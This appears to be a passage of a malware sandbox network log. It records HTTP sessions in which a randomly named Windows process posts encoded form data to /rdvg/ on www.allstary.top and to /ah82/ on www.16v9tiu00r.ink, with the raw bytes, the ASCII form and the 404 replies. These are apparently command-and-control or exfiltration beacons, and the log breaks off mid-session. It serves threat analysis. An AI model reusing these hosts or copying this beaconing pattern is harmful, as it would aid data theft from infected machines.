                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449928199.193.6.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:08.102015972 CET752OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 7a 42 50 2f 74 52 74 2b 33 38 46 72 53 72 6f 65 69 74 51 70 73 4b 4c 41 44 51 75 37 67 32 31 33 6a 68 42 65 32 6c 7a 52 66 2f 2f 63 54 58 6b 78 45 63 30 30 37 78 54 56 56 2f 39 6d 46 39 64 43 30 46 2f 49 67 65 33 34 7a 2f 45 76 39 48 32 41 37 72 47 64 77 31 68 4a 36 38 34 6a 68 36 31 70 4d 54 50 6b 51 34 36 68 5a 76 34 33 57 39 4b 55 32 45 68 48 73 74 49 6f 59 35 41 5a 6b 32 44 35 37 4f 41 4a 61 78 61 6e 4c 56 6b 45 71 7a 73 73 37 4d 58 4b 36 52 54 6f 57 6e 46 32 32 6e 35 72 33 47 72 45 6f 43 46 50 55 69 57 72 4c 53 72 71 79 41 31 43 76 51 3d 3d
                                                                                                                                          Data Ascii: q0C=eXfG9uSn/pWBzBP/tRt+38FrSroeitQpsKLADQu7g213jhBe2lzRf//cTXkxEc007xTVV/9mF9dC0F/Ige34z/Ev9H2A7rGdw1hJ684jh61pMTPkQ46hZv43W9KU2EhHstIoY5AZk2D57OAJaxanLVkEqzss7MXK6RToWnF22n5r3GrEoCFPUiWrLSrqyA1CvQ==
                                                                                                                                          Dec 9, 2024 08:50:09.327153921 CET533INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:09 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449934199.193.6.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:10.765821934 CET772OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 31 52 66 2f 76 32 5a 2b 78 63 46 73 4f 37 6f 65 6f 4e 51 74 73 4b 48 41 44 52 71 52 67 6c 52 33 74 6a 5a 65 33 6e 62 52 59 2f 2f 63 48 48 6c 31 4b 38 30 6a 37 78 66 6e 56 36 46 6d 46 39 4a 43 30 48 6e 49 68 70 6a 2f 7a 76 45 74 6f 58 32 47 6d 62 47 64 77 31 68 4a 36 38 74 30 68 36 74 70 50 69 2f 6b 51 61 53 67 48 2f 34 30 52 39 4b 55 79 45 68 44 73 74 49 77 59 37 34 7a 6b 31 37 35 37 4c 38 4a 61 6a 79 67 45 56 6b 43 75 7a 74 62 6f 65 2b 6f 37 41 6d 48 56 32 74 73 31 47 52 58 37 67 6d 65 35 7a 6b 59 47 69 79 59 57 56 69 65 2f 44 49 4c 30 65 6e 76 64 4b 42 6c 55 62 78 5a 53 78 42 4f 77 48 4d 77 75 64 4d 3d
                                                                                                                                          Data Ascii: q0C=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglR3tjZe3nbRY//cHHl1K80j7xfnV6FmF9JC0HnIhpj/zvEtoX2GmbGdw1hJ68t0h6tpPi/kQaSgH/40R9KUyEhDstIwY74zk1757L8JajygEVkCuztboe+o7AmHV2ts1GRX7gme5zkYGiyYWVie/DIL0envdKBlUbxZSxBOwHMwudM=
                                                                                                                                          Dec 9, 2024 08:50:11.985996962 CET533INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:11 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449941199.193.6.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:13.423752069 CET10854OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Origin: http://www.allstary.top
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.allstary.top/rdvg/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 31 52 66 2f 76 32 5a 2b 78 63 46 73 4f 37 6f 65 6f 4e 51 74 73 4b 48 41 44 52 71 52 67 6c 5a 33 74 51 52 65 33 42 54 52 5a 2f 2f 63 45 48 6c 32 4b 38 31 68 37 78 33 6a 56 37 35 59 46 2b 78 43 30 69 37 49 6f 34 6a 2f 38 76 45 74 33 6e 32 48 37 72 48 56 77 31 78 4e 36 38 39 30 68 36 74 70 50 68 58 6b 48 59 36 67 46 2f 34 33 57 39 4c 56 32 45 67 6b 73 74 51 4b 59 37 38 4a 6c 46 62 35 37 76 67 4a 63 57 47 67 4e 56 6b 41 70 7a 74 44 6f 65 69 65 37 41 36 68 56 32 70 53 31 46 4e 58 34 57 72 6e 2b 42 59 43 45 7a 79 6a 42 48 43 31 2b 44 78 4b 36 64 37 61 5a 6f 31 65 41 76 6c 61 52 77 73 63 75 56 59 6c 2f 6f 66 4c 6d 45 41 73 77 77 4d 6b 55 45 59 4b 6c 48 45 4c 61 2b 48 4c 65 65 67 32 54 4f 33 73 6a 44 4e 73 38 36 46 36 35 45 4e 6a 33 52 54 33 47 67 78 4f 37 4b 39 6f 6c 35 45 4b 33 41 36 4c 31 30 55 4f 64 72 6e 39 52 74 47 64 51 69 34 4f 58 47 6c 44 64 59 54 6f 39 48 4a 50 59 67 72 6a 67 54 7a 58 48 74 2b 34 36 44 41 4c 78 38 66 43 37 31 6b 42 6a 76 77 72 52 30 [TRUNCATED]
                                                                                                                                          Data Ascii: q0C=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglZ3tQRe3BTRZ//cEHl2K81h7x3jV75YF+xC0i7Io4j/8vEt3n2H7rHVw1xN6890h6tpPhXkHY6gF/43W9LV2EgkstQKY78JlFb57vgJcWGgNVkApztDoeie7A6hV2pS1FNX4Wrn+BYCEzyjBHC1+DxK6d7aZo1eAvlaRwscuVYl/ofLmEAswwMkUEYKlHELa+HLeeg2TO3sjDNs86F65ENj3RT3GgxO7K9ol5EK3A6L10UOdrn9RtGdQi4OXGlDdYTo9HJPYgrjgTzXHt+46DALx8fC71kBjvwrR0KVbv4zKP2R/V8B8alHkGlnubr2vbgV7l1yLgURFCmXfEq+Jwv6W5ze5+jff32FWQfyYGHNklKBNodBXo4f19M/JROR8WqyeTPBTh5WkMhSdirPel+4yAJ4OpROqn6PocVK359kgOMbhBGZXt6B1vKNxPmFGEdeJcTz/pXJDgOZIXDZEyt6HgNxjS8zVKEHOoVX0DLIMroT4H6pvz4bfh1lgHYR3RPg6Gx1rQ2AuGSTsiszNbo9Dn9ep9pAA2YWS4TfZboLdjNYuX/5wnIMYq+3dPIG0hZkVn5iGdmdWkM5/9r6TVsnLQbsOCCaBYPzVN57oRwpzruvytjaUm57iTQHRy0g5tsRwzyTi/lWV6+nINLgPYpF+jPjbd7MpgMOH7klxgbTb4cqKZUphEhceQgNAdphg/owR1XgAPLZGFr1YgDNVDDNzG92AIvj4v6oCnttvjy4vgtGguvH6Lu0x6AuQgAyRs/um+bSvsJSxSMWiCH4smci+dV3xIQpjPzW43IgonbiDoEfCOG2vToHd25Met1g5V4Ku7dLuJvL7a/Sy7Xistj+CmyyWEWDIZdCDv425dqwESAK/1TgAxgcdjiaM63/5Inl5Aaxk/qqqeGRKcmwlb8Wi1nkcmT6jqr2SHcUtbR17UE7c1zHPmm09FfPACn4cATCjRqY [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:50:14.707390070 CET533INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:14 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.449947199.193.6.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:16.073834896 CET493OUTGET /rdvg/?q0C=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&0vE=z2LXL2HhYNX8 HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.allstary.top
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:17.301317930 CET548INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:17 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 389
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.449968149.104.34.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:24.680794001 CET758OUTPOST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 55 4c 73 53 31 6f 71 39 52 56 6b 6c 56 4f 6f 68 33 38 43 6e 45 69 74 62 6b 4f 57 69 6b 4b 39 68 4c 6c 64 58 4a 6f 57 42 7a 65 77 36 70 52 57 74 34 2f 79 4b 41 77 64 63 4f 53 79 34 49 77 57 42 34 66 71 74 49 62 37 49 49 2b 49 6a 34 30 65 30 4b 47 42 46 73 6c 37 76 67 7a 58 36 41 2b 42 42 76 49 6a 4c 51 49 6e 42 43 77 51 63 69 76 34 54 65 75 75 72 34 62 5a 68 39 39 69 49 63 67 7a 6f 70 53 7a 6e 53 74 68 78 57 38 2f 35 62 58 66 2b 6a 6c 31 2b 72 71 62 79 63 6d 5a 52 33 66 30 64 5a 50 76 61 30 6e 63 6d 57 4c 66 6d 75 6c 58 64 37 79 30 51 46 37 67 61 7a 53 64 38 66 52 64 42 52 67 3d 3d
                                                                                                                                          Data Ascii: q0C=ULsS1oq9RVklVOoh38CnEitbkOWikK9hLldXJoWBzew6pRWt4/yKAwdcOSy4IwWB4fqtIb7II+Ij40e0KGBFsl7vgzX6A+BBvIjLQInBCwQciv4Teuur4bZh99iIcgzopSznSthxW8/5bXf+jl1+rqbycmZR3f0dZPva0ncmWLfmulXd7y0QF7gazSd8fRdBRg==
                                                                                                                                          Dec 9, 2024 08:50:26.244307995 CET218INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 7931
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: X-SUDUN-WAF-R-C=0001693096; path=/
                                                                                                                                          ETag: "67516c07-1efb"
                                                                                                                                          Server: Anti-CDN
                                                                                                                                          Dec 9, 2024 08:50:26.244324923 CET1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 44
                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>DDNN404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-sc
                                                                                                                                          Dec 9, 2024 08:50:26.244477987 CET1236INData Raw: 20 20 20 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20
                                                                                                                                          Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } bl
                                                                                                                                          Dec 9, 2024 08:50:26.244491100 CET1236INData Raw: 3a 20 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20
                                                                                                                                          Data Ascii: : 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (
                                                                                                                                          Dec 9, 2024 08:50:26.244503975 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78
                                                                                                                                          Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
                                                                                                                                          Dec 9, 2024 08:50:26.245135069 CET1236INData Raw: 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e
                                                                                                                                          Data Ascii: cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-c
                                                                                                                                          Dec 9, 2024 08:50:26.245153904 CET1236INData Raw: 65 6d 6f 74 65 5f 61 64 64 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 6c 6f 75 64 4e 6f 64 65 20 3d 20 24 73 65 72 76 65 72 5f 61 64 64 72 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 68 6f 77 43 6f 6e 74 65 6e 74
                                                                                                                                          Data Ascii: emote_addr; var cloudNode = $server_addr; var showContent = function () { document.getElementById("ip").textContent = ip; document.getElementById("cloud_node").textContent = cloudNode;
                                                                                                                                          Dec 9, 2024 08:50:26.245166063 CET515INData Raw: 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 22 77 33 32 31 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                          Data Ascii: document.body.className = "w321"; } else { document.body.className = "lt-w320"; } }; window.onload = function () { showContent();


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.449974149.104.34.134804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:27.379339933 CET778OUTPOST /ah82/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.16v9tiu00r.ink
                                                                                                                                          Origin: http://www.16v9tiu00r.ink
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.16v9tiu00r.ink/ah82/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
